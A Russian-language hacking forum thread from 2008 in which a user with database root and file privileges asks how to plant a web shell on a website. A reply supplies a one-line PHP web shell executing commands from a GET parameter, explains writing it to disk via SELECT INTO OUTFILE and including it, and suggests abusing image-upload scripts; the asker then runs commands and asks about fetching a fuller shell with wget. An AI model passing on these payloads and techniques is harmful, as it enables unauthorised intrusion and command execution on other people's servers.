Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть:
1)root-права
2)c://www/www/index.php (знаю путь)
3)ну естественно File_priv=Y
Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться
Или как узнать префикс? (там самописный сайт,локалка) =\
Фишка в том,что отклюбчен удаленный инклуд, Warning: include() [function.include]: URL file-access is disabled in the server configuration
оцтой =\
Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз))
самый маленький шелл это
<? system($_GET[c]) ?>
записываешь через инто аутфайл и инклудишь
Вообще если у тебя есть локальный инклуд, попробуй найти на сайте какой нить скрипт заливки картинок, аватаров в форуме например
Воспользовался конструкцие как у Спайдера,но не умею юзать я его,к сожалению =\
Как там директорию посмотреть ...php?c=-ls la?
Как с этого залить полноценный шелл? wget?
zДайте пожалуйста полную констркуцию запроса =)
ЗЫ: .php?c= echo "qwe"; -сработало xD
Последний раз редактировалось DDoSька; 09.09.2008 в 05:14..
File_priv
Комбинированный вид
